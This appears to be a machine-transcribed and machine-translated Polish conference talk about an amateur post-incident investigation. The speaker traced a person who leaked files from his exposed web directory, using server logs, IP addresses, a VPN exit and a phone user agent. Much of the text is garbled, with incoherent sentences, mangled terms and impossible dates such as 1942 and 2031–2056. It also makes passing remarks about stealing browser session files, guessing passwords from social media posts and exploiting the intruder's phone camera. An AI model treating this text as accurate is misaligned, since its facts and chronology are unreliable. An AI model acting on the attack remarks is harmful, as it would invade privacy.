Analiza powłamaniowa okiem amatora — Case study

Ok, I know, I know. Do you imagine yourself sitting on a chair or something? Or not so much? Ok, I don't see any sounds, so I'll take this chair. As this is the end, I'll approach you a little friendly. I thought there would be less people, even less than there is. Oops. I was in the Ministry of Digitalization talking to the Minister and I was less nervous than now. So, sorry for some language errors. I decided to dig up an article that appeared on my blog a year ago. It was linked by Z3S, so probably some of you know it. If not, you are not reading the weekend reading. Or you don't read it at all, or you should. The guys paid for

it. So, yes. Analyzing the development with the eye of an amateur. I think there are many things for an amateur. I try not to consider myself a specialist, because it often loses sooner or later. And I will discuss such a case of a man who some people know, I mean... We will call him Dzis, because he was the one who appeared under this pseudonym, or Lick Crew. If someone would like to find out, apart from recording, who this person is, or what other nicknames he is connected to, and laugh, of course, I invite you. So let's start with the contest that was announced a few days before SBS. It was about finding a flag on the SMS.pl server.

The magic of this was that we just had to do curl-v on http.sms.pl and we got the flag, as you can see, black flag in azure color. There were 10 people who answered, including one woman. There were 5 people who found the flag. One of the participants is one of the prelegents. The other three were given free identifiers, but they were paid and were given to me as a small gift. The whole problem with this flag is that we use HTTPS. Every time someone from the search engines tried to read this flag by the header using the browser, it was redirected to the HTTPS. The HTTPS has the HSTS header, I would like you to use it as administrators, because it makes it impossible

to attack the SSL account or DLSA, when it comes to the website. It also makes it impossible to communicate with the browser on this unsigned traffic. It makes it impossible to read the flag through the browser. The only way to read the flag was using the console. One of the most interesting answers I've ever received was checking the source of the website, reading that the website used the IEO font and finding the flag icon and saying that the flag is grey. One person probably said that the flag is black. Unfortunately, she didn't know the value of the flag, so it wasn't recognized. In hex there was this value of the flag in fonts.io, that's why this short text poem. What we see

here is a fragment of the email I got from one of our agents as an answer. What is SMS? I come to you every year, I introduce myself, I'm Piotr Jasiek, I do something like SMS, you can compare it with sending SMS by phone, it's Security and Management Systems, at the moment it's a business activity, I'm very happy to be registered, I can legally pay taxes from what I do. I started from the association, something that grew from the basement of Warsaw hackerspace, And for the moment it's an IT company, because we do some services there. I really appreciate our colleagues from NASK, CRT, Adam, Z3S, who can talk about their work, because my clients are completely aware

that if there is a compromise, I cannot talk about these capabilities, because I am often under the supervision of web developers or server guardians and they invoice the client at the end, so my work is often hidden in a way, and it hurts a bit, because I have to dig up such things or just try to avoid the topic and talk to you somehow. What do we give to the client? Increased security standards on hosting, VPS, www. You can see it on the website, because it's not a commercial presentation, so I'm sending it to the website, if you would like to see it, I would be happy to. If you find errors on the website,

I will gladly accept suggestions and so on. I repeat it every year. I gladly accept suggestions about errors, typos and so on. Analysis in the concept of criminology. It's searching for the relationship between certain events. Often, the mistake is a typical event investigation. So that's a big problem. It's about verifying certain behaviors. Checking the evidence, checking the next versions. There's a text, I'm trying to read it, I also suspected this year that it might be shorter than in previous events. Last year's. The biggest analysis that happens is that we call it, there are many versions of analysis. There are stock, banking, legal analysis and all of this is because someone sits on their four letters and analyzes everything from the beginning, checks all the threads, where

and how it appeared, why. Michał, I will use you as an example, because I like you very much. Especially this year, I like you very much for this discussion about the fact that when Michał gets information that something is wrong, he sits down, analyzes, checks, there is also some form of analysis. Investigative informatics is one of the sciences of the court. It's a pretty cool thing. It is supposed to provide digital proof, which is different from what technicians do in the form of collecting fingerprints, cigarettes, but in the analysis of informatics, these are fingerprints. Here my colleagues recently talked about fingerprint printers. I don't know if you know that on photos from phones, apart from metadata, there

are also data such as lens data. I think Adam gave an example of CSI. I want to find out about what is actually happening there. I think that 80-90% of what is shown in CSI about this information issue, i.e. obtaining data from photos or monitoring, actually happens. I don't want to go into details here. I just wanted to say that the goal is to determine the course of events. We know that. The motives of the perpetrator are obvious. But where did the victim come from? Here, my colleagues... They described, for example, the Quake issue or other such situations. Someone became a victim, but why did they click this email? Why did they deliberately spread this

malicious programming? Why did he become a gate? What was his motive? Maybe he wanted to see photos of his friends from vacation on a distributed pendrive. This is probably one of the best known examples. He got an unaddressed email to himself and to a colleague from the collection next to the PDF of payment. Or, for example, a payment strip. This is also very interesting in companies. I also met with this somewhere in the couloirs, talking to my friends from Pentest. who say that one of the ways is sending emails with payments. I get a specific email every now and then, which theoretically includes plans for the construction of a shopping mall. The email is only for people, and when you put

it back on the virus, everything turns red. But to be honest, after starting virtual, there are some plans, but after restarting, virtual is completely encrypted. And it wants 100 bitcoins from me. Or let's say the old version of ransomware. The sources of information in the information research are: floppy disks. Who uses floppy disks? Nobody. Who? NFZ. Okay, it's some... Why did you change... ZUS, okay. ZUS, NFZ... It can be. Why do I go there? The disks are a small space where you can hide small files, a list of compromised passwords, stick it under the desk and the police will come looking for the apartment, they will look for pendrives, discs, hard laptops, computers, I don't know what else, SSDs in the form of electronic, long,

not just ordinary ones. But nobody will look for floppy disks, right? Nobody will look for floppy disks in the ventilation. And even if they find floppy disks, there is a possibility that the police officer will see a sticker on it, Windows 95, he will wave his hand, he will say that it is not important. And there we can actually hold some materials that are compromised. Backup tapes, i.e. when someone enters the server, these tapes will of course be secured, copied, and this is for people who work in servers something obvious. Hard drives, no words to explain, as I mentioned before, this is something the police is looking for. Memory, pendrives, servers. Servers in my opinion like VPS, because we keep a lot of data there.

And we are not fully aware of how they can be sensitive, like logs, where, when we log, how we sometimes proxy our traffic, from which IP addresses we log to our server, because it may also turn out that these IP addresses correlate with something later, with another server, it turns out that we logged from the same IP address on day X, when someone filled the IP addresses somewhere. Okay, it was a track address, but it's a proof of the past, you can start to figure it out and adjust it. Social media is not necessary. Choosing a person from the street and Facebook and after 15-20 minutes I think the record is 5 minutes that my friend was able to build a base of words and passwords to

get the password quickly and get to Facebook. It was the name of the dog and the date of birth of the dog, where of course it was marked in the post because someone had created a dog fanpage. So why not? Cloud disks, of course they are Google disks, or some Dropboxes, not Dropboxes, we also throw our files and photos there, photos have metadata, most often attached, because of course nothing cleans it, because why? Of course, we keep documents, I don't know if you are aware of what is one of the requirements for server location when it comes to storing personal data, when it comes to Polish requirements. Exactly. The EU borders, so the storage of personal data on Google is

bad, bad and punishable. What kind of punishment is it? I don't know. I don't remember if it's a prison or a prison sentence. I think it's a prison sentence. But it's definitely problematic and it's hard to explain. And of course, internet browsers. I would like to mention my time in Technicum, where in Pascal a very simple program was written, which simply stole profile files from Mozilla, it was enough to copy them to ourselves, run them and we had all user sessions, logins, passwords, everything that was saved during the review. Suddenly it turned out that we had achieved the same person, who lost this data, everything was correct except the IP address. If the server or the portal didn't have something like cookies that were assigned to the IP

address, we could become that person in a matter of minutes. It worked on Facebook, on all kinds of photo blogs. I once had a friend explain how it happened that her photo blog changed into a very ugly erotic page. I think she understood, she stopped writing passwords and always started logging out and stopped using unknown software from the Internet. So it worked. Of course, it was a targeted attack on her. So she had a bad chance as an unconscious user. When does an informatics search for shares in Krasno? When is the defraud of financial funds? Well, you know, you have to track who, when, how. Here my colleagues talked about bank transfers. If I knew what they would talk about, we could make a different presentation.

The violation of the labor law. Because these conversations between the employer and the manager were also recorded somewhere. "Listen, we will pay less for this, we will pay more, we will cut his hours." These evidences are familiar somewhere. It is often the case that documents are carried out on the basis of double accounting. On one Excel we write actual graph, and on another we write graph that we send to the calculation and the worker from 240 hours gets 140, not 160. So where are these issues cut off? Of course, informatics investigates the action, when we can also talk about SMS communication, where employees or managers contact each other via SMS, e-mails, it can also be added here. Data theft, of course,

as an informatics investigator, such a person determines how this data was stolen, when and of course who stole it based on available evidence. Industrial espionage is one of my least favorite types of espionage. If international espionage is fun for me, because it's funny, industrial is not fun, because we steal someone's intellectual property, money, hard work and it may turn out that someone, let's say Bill, He worked for a company all his life, he did everything great, then came Michael with one exploit, he gave him a few key codes and it turns out that unfortunately he can't do it anymore because he developed it, sold it. Bill's product is not cool anymore because it's old, and someone patented it. By the way,

patent law in the US is funny because it's probably the first one to be the best. So it's hard to prove that someone was the first, but no, it's not someone else. The breaking of copyrights, as I said, we can also connect it. The disclosure of trade secrets, here we go back to where these messages came from, were they emails? The theft and use of personal data, this is another, not to say in bad words, very bad behavior. which appears in the whole Polish Internet, the trade of cards, which was often taken away. And something that is a last point for some, it is a commonplace for some criminal cases, the trade of drugs. I'm sorry, we live in times when

accounting or accounting, communications are carried out on the Internet. Maybe if we did it through post pigeons, the police would not be able to get out. I know examples from Polish Internet, unfortunately hackers, who fell for stupidity, because he had a few trees, police came, tried to lock him up for trafficking in drugs, they took his computer for prevention, after searching for any list of accounts, who sold to whom, amount of expenses, you know, accounting must be done in every business. It turned out that he had a few bad software, he was running into it, they spread his hard drive on the first part, it turned out that there was a little more evidence than they expected and he had three things in common. He was into drugs

and then two separate things about hacking. In the last period of time in Europe, informatics in terrorism should help a lot. The effectiveness of our services and foreign interviews shows it. Theoretically, we have biometric recognition, we have a lot of security that could allow us to identify before. Unfortunately, it is often implemented only after the fact, closing borders, verifying who actually comes to us, who doesn't. In terrorism, there is also the introduction of operational activities, which I mentioned today. such as interviews, auditions, interviews, obtaining information, intercepting information, destroying communication between individuals or terrorist groups. This also happens. This way we introduce disinformation and destroy their cooperation, they are not able to talk to each other. We hope

that maybe before we catch them, the guys will think about it or at least we will catch them before they come up with something else. Murder, suicide. In murders, it's quite simple, like in any other case. In suicides, every suicide is always questionable for the police. The approach, as shown in some Polish films, that the prosecutor comes and says it was a suicide, it's not like that. It's always questioned, it's always verified whether a suicide was not caused by a third party. in a different way than physical. We have a problem with cyberbullying, I remember the term well, which is being persecuted on the Internet by sending naked photos, editing naked photos, because I often met someone who took a porn model, edited a photo of his

face and sent it on. Then translating from such a photo is also very difficult. The injuries, the calls, the touching of someone, it can all lead to the suicide of a person. So it is also explained by the technicians, the informatics, and they verify whether there was no influence of third parties on the decision of the person who made such a decision. It's a sad event. And this is what I was talking about a few slides ago about motives of victims. That something happened, someone had a motive, became a victim, not a perpetrator, but a victim of this crime. But why did it happen? Why did it all come to light? Crime is organized, as I said, everyone runs a accounting company, the bigger organization, the more likely

it is to make a mistake. And more data needs to be stored, processed, so I believe the fewer people, the safer. And of course pedophilia. Since the internet appeared, pedophilia has been... We have to fight. Police, investigative informatics, Internet users are fighting. There are a lot of groups fighting. Recently there was a loud stop of pedophiles in Europe. Who watched Mr. Robot, the first episode, I can spoil it. In the first few minutes I see a situation when Mr. Robot He discovered that one of cafes on servers is always gigabit connection, which surprised him. He noticed that it was one of the nodes of darknet, where pornography is spread and he reports it to anonymous client.

Such behavior, when we get such data, we as Internet users, I say right away, is not in accordance with the law, it is bad, not good, because we are also criminals, we are violating someone's privacy and dignity, but whether pedophiles deserve to be held under this same cover, we will talk about it in the collars, probably. So that's how it looks, when this action comes in. What do I want to talk about today? I want to talk about the situation when Zdzisiu, Zbyszek, Lickryu, called him an intruder. A few days before that, the intruder looked at his page and commented on the post. Why? How do I know? I will explain it later, I have nice screens for

that. And now, on 26th of June Intrus was collecting data from publicly available host and found the correct data. Here was a mistake on my part, I as the administrator will bow my neck to the guillotine. He creates a package, on which he puts paste on the BIN, of course it's very vulgar, under my address, and I don't know what he's trying to achieve. It wasn't a mistake, but an attempt to force something, I don't know, a vote. Or a vote, but not the one he wanted. An email appears on my inbox, sent from ProtonMail. I think that in the life of every administrator, who manages anything, wherever, at least once in his life it

was hot, when he got an email: "Hey, I hacked you." It's like with a bomb. You never know if it's not the day you fell into and fell down. You might have received 10 emails before, I got another one a week before SBS. This time from a person who signed R3KiN, a so-called shark from WP.pl, but that's a different story. And maybe at this moment something happened. Of course, at this moment you should not let down any such message, only verify, reach any possible machine where there was access. Even if there was no access somewhere, you can still go there and verify, because you can never be sure that something happened here. Just like our motto here is "No system is

safe". There is no, there was not, there will not be. Two years ago I talked about these three rules. so-called MRX, meaning there is no secure system, there are no impossible things, and play not only with a computer, but also in the real world, i.e. the social technology. Three such rules that I always remind. I receive a private message, read an email, post a paste and info on social media. I decided to play the intruder game and voluntarily admit to any error and publish that I received an email with a leak of my data. I consider myself a protector and I could recommend it. I think it's fair to those I help to protect myself. It's a bit of a hint not to

be afraid to admit mistakes. Because when someone admits to mistakes, you can find Jacek, Tomek, Staszek, who will come and say "I know what could have happened, I will help you, it will be better". When we hide such situations, we dig our own graves. I don't remember, I think Sony got hit in the back some time ago. They probably delayed the publication of information about the attack for a week, and it ended up that no employee could log in. A week of delay and you wonder what happened. Unfortunately, a week is too long, maybe a company would report something. The same thing happened with the hosting company Adweb, I don't want to say the names

now, but they also delayed with the admin, then there was a problem with the admin and they had to use it again only after the fact with the help of people from outside. So I decided that it was worth publishing this information. And, attention, the last part of this sentence: "I'm leaving a trap". I suspected at the first moment, after looking through the package, that I probably know who it is. I knew that this person is not very clever. I expected that one of the IP addresses I had in logs, because of course I copied the data somewhere, will enter this article and repeat, or will not look, will repeat its activity, that this activity

will be repeated, I will know that the same address and the same data will appear again. I start reading logs at 1 p.m., at 2 p.m. I already know everything, I write an article, I do log analysis, that's it, by 8 p.m. I finished the article, On the 20th of May 1942, Intrus calls again and assures that it was all a joke. If anyone wants to read the conversation, then on the blog, on the other side of the blog section, there is this article. I haven't read this conversation, because it was bad. Intrus says that it was just a joke, that he was just joking and so on. If you see the message, then you

will judge it by yourself. Data analysis and full proofs are true, it took me 6 hours. I had to do my own things, unfortunately it was a period when I was not only living with SMS, but also with work, with home, with cooking, with dinner, with sandwich, one has to eat. At the beginning there was chaos, I mean e-mail. It started to show up quite well, so I think you can see it on stream. The email came to my server at 6:34. Someone really can't sleep. I'm sleeping well at this time, because I wake up at 7 am most often. So, send me an email after 7 am. If so, then we can have fun. Hack after 7 am, between 7 and 22 am

is best. Then I'm sitting at the computer. Now, welcome Mr. Hackier, whoever reads this, who doesn't know what HT Access is. Okay, I'm using NGX. In NGX there are also HTAccesses but you can do it much more intelligently than in HTAccess. Here is a broad tutorial, thanks for the information, it was useful, I used it later. The data is on your Dedic, so run it. The first characteristic letter of this person, a mistake of letter L with R and it's not a target. The pass-tab, of course. This pass-tab is active, I didn't fight for it to be deleted, it still is. If anyone wants to read it, I invite you. I don't know if it will be visible well later. We are a super party. Of course, a

direct return from YouTube. PPS, gimbuses are just pushing you because I put Mirko on the dig. Of course, it was about the mining environment and the way of throwing the pages there, and then it ended up with someone getting some DDoS. Of course, there was no DDoS, I was so eager to put an account on the mine to add it, or even add a post, because I really wanted it to be DDoS. Because then I had a deal with ServerOwner that if there was DDoS, they would give me addresses from the account, to have more data for analysis. Unfortunately, it didn't happen. I was very sad about it. Why are we doing this? Because you

are a pervert, a prissy, a self-confident fan of the Internet, Star Wars, Metasploit and pepper chips. I can't eat pepper chips, it will make me very sad. I like Metasploit, I trained from it, so if you want to learn from Metasploit, Unexposed, Rapida, Vulnerability Management, let's talk about it. I've only watched the MTCIT, I like the scene of cutting edges. "I'm a fan of the Internet, I'm an IT specialist, I like the Internet, I'm addicted, yes." "From the beginning, a lazy, prissy, fan-like person." "Not that fat, that's good." "As you can see, I don't know if lazy, I dressed nicely today." "Lazy, no, fan-like person, we've already explained that." "You're bullying poor people, you're trying to educate them and you're

taking money out of them." I didn't go to the point where I was wrong, maybe it's because before we were a association we organized a small donation for domains and server maintenance, which we didn't give back because we made money so we could give them back. It was about us being pushed, there was no income and we didn't want to spend a few hundred zlotys from our own pockets to maintain all of this. We gave back the money, greetings to Lapis and the whole company that helped us, we thank them greatly. Next point is PPS. Even if you go to Psy and they see IP log from Thor, you will get a letter from Marge. Cool. I thought they would die after 30 days, but okay.

I wanted to point out the use of PPS. While PPS is still working, PPS is still here. So another result that this person is not very intelligent. And we are greeting Lick Crew Black Hat Rules My hands are cold, seriously. This is really nothing, let's go on. We have now come to the pastebin. Link to the paste was also received on the IRT. No, well, great, of course, there is Lick Crew, beautiful, there is a pastebin. Yes, I know, I had a old version of XChat, it was some Windows, so I tried to start it quickly. There is of course Android IRT, because why change the ident? Why not? You can work this way. Pastelbin is the best place to put leaks? Yes.

Don't be fooled, it's good. I don't know if you can see it. It's hard, right? I can see a little better, so I'll read it to you. Today we are putting some data of a certain IT set operator, Piotr "Pechata" Jaśek. I recommend you read the dictionary of Polish language, because my name doesn't change, contrary to appearances. It's from a foreign country, several generations back. But I could ask before I wrote an email. If it sends the data, why not? This individual is so arrogant that he deserves a punishment. Wow, cool. I'm doing something good because I have enemies, right? It's probably okay. His servers, hehe, dedyk, turned out to be an ordinary VPS for

narne djingi. I've read it so many times before the presentation, I don't know how to read it. We used the Rotbox, which is currently advertising, they didn't pay. Like others that I will advertise. I'm kidding, nobody paid. Poor thing. But the point is that we have advanced in terms of savings. Let's face it, being a association with a few members, minimal cost, you have to save. But okay, great, he put it out for us. His cool data is in deep hiding. HTTPS 62181 847. The address is no longer there, it was removed a long time ago for other reasons. Screens and RSA key to the shell are in the package. The address of the shell is 52181 847 22 port.

Excuse me, what a miracle I keep my data at 62181 and my shell is at 52181. Someone was messing with the lettering, right? So he didn't even read it before he published it. I suspect that the conviction about the secrecy and the authenticity of the data was so great that he decided to quickly and unambiguously publish the data. What he published, we'll see later. The address of the SMS.pl blog is the address where "Sądzimy" lives, Kochanowskiego Street, Wawa is a dick. I will of course open the package link. I like the wording "Sądzimy". I already knew that this was not a person from Warsaw. Who are we? Here is the best. Known for various fucking flaws. I guarantee you that I called a friend of

a security guard of a very serious company and asked if he knew these people. I will not try to answer, but it was: "What are you doing here? I think I'm doing this." He is KG and he even said that these are no-names. It turned out that it is another, generated by our beloved friend, we will call him that sarcastically, Zdzisia, another pseudonym and his actions. We don't have any cool hacker tips like this one, but today he's unlucky. Unlucky. Unlucky. I mean I'm unlucky, but this situation joke didn't work out. Greetings for the hacker from Białywierz. If someone will explain me what's going on, I'll put a beer. Okay, you have a beer. Okay, okay, the beer is over.

Michał was the first. But you know what, I didn't think about this side, but no, this person is not sitting in Białywierz. Not anymore, not anymore. I know that not anymore and not on Białywierz. PS, high school students, Move your ass, install Nmap, because it's set to UI services. Of course there is H in front of UI, but without C, so it would be shorter. So it has some complexes. May onion be with you, habenus papa. Smiles from Pope and onion. It doesn't fit, it bites a bit, but okay, let's say it's a very serious player, it still does what it's supposed to. My fault. What's the point? I'll explain. It turned out that when I was configuring NGX for the first time

in my life, because it was the period when I was going to NGX as an administrator, behind the words of Hehesa, who is somewhere here, I forgot to configure the default config for SSL. And of course I threw out the first available config, as it turned out it was my FTP, I mean www FTP that I used to send data to my friends, like a wallpaper, logo of Illuminati, kernels, I needed apt. I learned Python, I was working on something, there were folders of SMS, there were materials. I hope this person learned a lot from my materials, because there were a lot of them, there were prices, from zero to hero, when it comes to C++, there were dives in

Python, there was a lot of it. Maybe he learned something, I hope, maybe not. And if he installed kernel, I feel sympathy for him, because there was a bug that I missed and after reinstalling and reinstalling everything, the system just went out of order. It worked like in the past, but on kernel. Kernel just collapsed. I don't know why I've found it today. The first kernel compilation in my life. Of course, the package was uploaded to Google. Of course we have the time, 05:15, 26.06, created 05:15, ph.leak.zip, ph.leak.zip, ok, great, let's go on. Full version, I promise, I'll buy it someday. We have here an important information, which we laugh about, but it's important that it's about analysis. I know it looks like

I'm making fun of myself, but I want to show you how I, as an amateur of jokes and really serious person in the industry, I don't say that I'm a serious person in the industry, I'd rather work with serious people like Mac or guys from CRT, who can act on their tasks, talk about them. Unfortunately, I often clean up after such situations and I can't talk about these instances. It's a pity that we laughed at this conference. The important thing is that the ph folder has been modified, created or recently changed by 5.04. This is the first important information that, in addition to sending an email, tells us when the attack took place. Let's go

further. Of course we have here next dates, 4:55, 4:43, 4:52 and of course 4:43, 4:52, it covers itself, so it didn't modify these screens in any way. And it should, seriously. I mean, seriously, it should modify, I say why. You can see the dates, shots, it can also suggest what device you used, whether it is capture or not. There are specific screenshots. Guess what device did he use? Yes, Android, but he used a mobile phone to take screenshots. I didn't think about it then, maybe my knowledge was a bit too little, I was just so excited and laughing that I decided to give it to you. I suspect that if I took the metadata of

these photos and I suspect that after packing them in a package I would still keep them, I would get geotag, I would get data like, I don't know what else is there in the photos, geotag is a phone model, What time exactly, if it was dark in the room, everything. I suspect he definitely had a geotag on his photo, so I think that would be the end of the story. But let's move on. These packages. Package contains one of the SMS meetings, unfortunately, Mariusz Litwin is no longer here, but he was the creator of this. We watched Star Wars on the Internet. If someone doesn't know how to play, let them ask Mariusz Litwin. He will tell you. I see Michał is nodding his head. Do you

know this? It's great, right? Two hours to play Star Wars and drink beer. Okay, it doesn't work. Now Patryk. Okay. These are screens from my computer, I decided to do it this way. The second screen is index and the address. Public RSA, I found the key. Do you remember what key was revealed? Private. What is public_rsa file? I think that English is not familiar with us again. It's a UNIX file, because it's called id_rsa. I'm sure I remember it correctly. I'm showing you what's inside. After I marked public_rsa, Windows showed me this signature. H1, nothing interesting, just keep going. It's a default index from pht.sms.pl. It worked so well that it played the index, not the file. They made a mistake in

the get or curl command. It's hard for me to define it. Moving on, of course we have a lot of photos, dates, and on the first two screens we have a lot of important information. The first important information is that when performing an attack, it can use something like OpenVPN. It's a valuable information, because we will use it later to paste its identity. The second valuable information is that besides using Android, it uses the GPS connection, or LTE, or H+ I don't remember what the H+ is, I think it's HSP. Okay, good. I see here, it's good that you help me with this. I was afraid that you would go fast and without reaction. Okay, so we know that it uses OpenVPN

and some mobile card. It doesn't use Wi-Fi connection, which would be a little harder to color, because they often repeat, change and there is a failure with it. At least in my opinion. We go further. We read logs part 1. Of course, I dropped all the logs from 26. And we see that some Applebot has been reflected. And we have this IP address: 78.46.47.126. About these hours. which were mentioned, public_rsa, /, favicon, public_rsa, pkpa are reflected. So we know that this is our intrus, it is looking at the data. Let's go further. Identification of the IP address. The IP address is of course nmap, because they told us to install it. We run this address here and

we look at it. And of course what do we see? On ports like MasaMasaMasa there is something like port 80. Wow, we identify the server. Would it be so easy? Unfortunately not. But it turns out that the main server is client.openvpn. Of course, opening this OpenVPN indicated that on one of these high ports, I bow my head here for changing port or someone changed port, it was set to open on a high port. Later it turned out to be a public VPN, one of hidemyass.com, so it's a blind alley, but we already have some data. Let's go further. And in the way of notification again. What else do we see here? We see that our intrus didn't use the default

option of the peer. I emphasize, it was a peer. A peer for many clients uses the IP address and the host to hash. It hides the IP, it didn't use it. And if I used it, I would have to write to administrators who might like me or not, maybe they will write me what IP address they had or not, it would be difficult. I know because I set my own network and I said, seriously, it may be difficult to talk to an administrator because someone has been talking to him before, it was not possible to get it. And again I say, I am a paste in the beloved and there is this address. What do

we do next? We read logs part 2, we look for this IP address. What happens? We have IP address again, 26 at 13:00. After sending information to the social network, the intruder returned from the same IP address, which he sent me a message on IRC at 7:00. Bravo intruder! As long as the behavior that appeared at the beginning, that he first sent First, he checked with OpenVPN some IP address, is it an anonymization? Great. He sent me a message on IRC from another IP address, great, another point for him, because another IP address is over. At first I thought it was his discovered address, but I looked later on this adslplus.kch and I thought, I don't know what

country it is, let's assume it's... I say, I don't think Switzerland is hacking me, I'm not that well known on the Internet. And we were looking at the logs under this address. We got a lot more, because we were looking at favicon, coq, the contacts we were downloading from favicon, we were looking at kernel repository, css was taken away, nothing special, but there is one thing. A common denominator. Nokia N73 build/jdq396. It's quite characteristic for all phone models when it comes to user agent, but the probability that someone would mess with us on the same IP address that is proxy with the same phone model is very low. It's still a proof, I emphasize it,

we still don't have 100% certainty. I mean, I only got 100% certainty after I knew this person, so unfortunately it turned out differently. I downloaded all the logs I had from before migration, after migration, and from Kinko and other sub-servers I managed. I was looking for everything from the last trace. So I went beyond my typical scheme that I'm looking for in the current time. What turned out? That looking for this Nokia, I will not pay attention to one basic error that is on these screens, but it's good, I'll tell you later what the error is. Of course everything is nice and beautiful, there is some trash stack that something is being checked, 26, 26, right? And what happens? On the 23rd,

his entry appears. So the entry was already on our server on the 23rd. Okay, let's keep looking. Non-track IP address. You see? Here. There is another address, the same client, the same behavior. There is an hour there, yes. It's a Play address. So again, we confirm that it may be our intruder, because he uses a phone and uses a connection via HSP, i.e. the mobile one. Questions for the proofs, for now. On June 23, 2016, at 3:16 p.m. the address was given as it was in the presentation. I won't read it, because it doesn't make sense. This person between 26.06.2031 and 26.06.2056 joined the host using OpenVPN on port 1194 or another. At this point, the configuration could be a little different than in the

later file. So we assume that in general, what is the host of VPN? The suppliers see what we are doing, let's face it, one of the colleagues said earlier that such data can be ordered. So, they don't block, they don't do anything, because they don't have the right or need to do it. If they had the right and need, they would do it. And of course, the third question: is this person in the time between 1926 and on the 26th, when we have 13:31 and 13:45, it was connected with 178.39 in any way that allows tunneling data. I didn't find it, I didn't want to look for tunneled data, it could be a tunnel. Unfortunately, your programming is everywhere and I admire it

because many people use it. That's why it's so nice and beautiful and used for everyone, even for our day-to-day life, I guess. So it's a big plus for you because you created easy, simple programming that is pleasant. So that's a big plus. I know you are a bit cold this year. We are able to establish three basic proofs, we ask them questions and of course we get certain answers. Three times yes, It's an order, an order, it's not said much, from what I learned yesterday after consultation and presentation. I set a time very pessimistically, which is needed for arrival or reaching this intruder. I set 24-48 hours. How do you think, how much is it? The regulations say that the police has an obligation to

contact the operator, and the operator has an obligation to issue documents. So in a good case, if it was a theft of several million, I think that within 5 hours they would be at him, counting the arrival. Therefore, also taking into account this, I think that it was very elegant here. But let's go further, because there are still a few slides. Of course, these are road signs. Another intruder activity. Of course, as I said, I was looking for another activity, because I'm not a legal entity, when it comes to the police, the service, I don't have access to these databases to check it, analyze its movement. I decided to look for what he was doing with me. Of course, I was looking for this Nokia, skipping

the 26th. Seriously, I got a stack of garbage, it's really cut out, because there was a lot of it. He's a regular visitor on my page, so I'm glad. Maybe he's watching me now, I'm helping him. I suspect that in three days I'll get the information that he broke in. I'll have something to do, thanks. Of course, something like this will appear at the very end. I'll comment on the intro. He commented on the post: "Zosia Samosia is migrating from admin's monument. Of course, it's WP comments. There is Linux Android 4.2.2, so if we would prepare an exploit for his phone, it is also possible, why not. We have a specific phone model, its version compilation, so we can prepare it again. Nokia, so Windows Phone, more possibilities

to prepare an exploit and take a picture of him with his camera in the phone. Android, oh yes, sorry, Android, yes, it's still... Okay, good, you know it well, but I got lost. But what am I going to do? He commented: "If I know the date, time, my blog, I know the article..." I even answered this comment. Leszek: "What about securve.pl? Apparently it was hosted at your place, but it's gone." My answer: "Aden, the website mentioned by you, has abandoned the project. In addition, all accesses were taken away from him due to the violation of the security that he allowed." Seriously, it was hardcore. When I get a call from one of the administrators, because it was a rented server, that something is happening and if my blog activity

doesn't bother them and they are generally available for this and for everything, then strange things start to happen on this hosting and some spam starts to enter them. We blocked it, the person lost it. It turned out that on one of the shots he got, he also tried to root, but it didn't work out. This is a story for another presentation, how he tries to get a root. This is some kind of a... here we have a motive, right? And suspicion who it could be, of course, it turned out that it was the owner, the person who led this side. This person, well, there is a motive, we have a suspect, if we were the

services, then at this point we call the prosecutor and file a complaint, right? If you don't have HackerBox, use Google. What I've mentioned at the beginning, not everyone noticed, Zbigniew Budziewski. Is the same thing generated on the basis of this break? No. It's another fake account on Facebook, which is verified by a person. I mean, it was verified by me on the basis of a call: "Hey, listen, is X Y?" Yes. Thank you, the end of the topic. My vampire has been solved. The interesting thing is that Nikos probably noticed that the package is signed by name and surname. Maybe someone from the list, but probably Nikos, because he's laughing. I missed it completely. Believe me, I was so obsessed with reading logs that I

missed such an obvious thing. Of course, I googled it here. It's hard to see, but maybe I'll post it on stream later. There's an article on the website, everyone can read it. It's a bit crummy, I was under the emotion and decided not to make it easier for the reader to go through the situation when he's a world-min. He doesn't want to cry, but he also wants to laugh, it's funny. To sum up, it was probably the best time I went with Irc. I won't read it, everyone will read it by themselves. So, the summary was so beautiful that if you are an administrator of anything, anywhere, remember that your system will never, never, but I promise you, will never be 100% safe. Last year

there was a beautiful presentation that there is always one error in every software and it was not found. There will always be a problem that you missed. Like here, I don't know who said last year or this year not to invent your own cryptography, because it won't do you any good. If there is no one to verify it, it will always be bad. Although I don't know how you would be convinced that it is good. The problem is that mistakes like a few screens later could end up really bad. I know admins who keep their private keys the way I keep public ones. If this time we laughed and it was fun and we had fun with the last presentation that was a bit loose at the

end, then who knows, in another situation I might be standing here crying and talking about how I lost a few million customers because I made a stupid mistake. A stupid mistake could change everything. in my career, and it doesn't matter if it was me, AdamZ3S, or any other person, if it was some dangerous person, he would be destroyed, no matter what PR he would have. And there's no reason to laugh. Such situations are dangerous for everyone and if we don't have this awareness and responsibility, if we consider ourselves as Iron Man, Captain America, IT, security, sooner or later someone will appear with a cryptonite and we will fall like Superman. It will end. Is there anything else I wanted to say? Well, as I said,

the best is taken on IRC. The question is how to be a celebrity? I don't think so. However, the answer to this question is beautiful. If you are a celebrity, random noobs from the Internet are trying to hack you. If they find your automatic www index somewhere on your server and your public key on it, they hype: "Wow, I hacked a phat". I think that's it. And that this message that I wanted to convey, that everything is funny until the end, And that you will come back home when someone has indexes or is not quite sure. The question will be right there. That he will come back and check and check and think three times if you can actually sleep peacefully tonight. If not, correct me. Today someone laughed

at me and looked at this person, I looked at him for a moment, but I will not say loudly, she laughed that I do not go to afternoons and get up at 5 am. Updates will not do it themselves, and unfortunately these emails come more and more often and will come more and more often until I develop my activity and I am aware of it. And the question now may be what I did when I received this email. I reinstalled everything that was given, I reacted You can say that I'm a typical schizophrenic, a person who is disturbed by everything. Why? I preferred to be sure that I'm fine. 5-6 days ago I got another

email with this information. I checked all the logs, I made sure that there was no breakdown, I'm 100% sure. Because there was no trace of neither at Vendor, nor at me, nor on the firewall. By the way, if anyone wants to ask what I use, I invite you. Nevertheless, the server went to clean up. All the data was checked, secured and then the server was set from zero, including the Debian installation. On the level of its installation and taking distros from the beginning. Because I was afraid that I could still miss something, despite my administrative certainty. That's it for the presentation. Now questions from you to me. I have a question. At the beginning, there were some jokes from Białołęka. You suggested that this

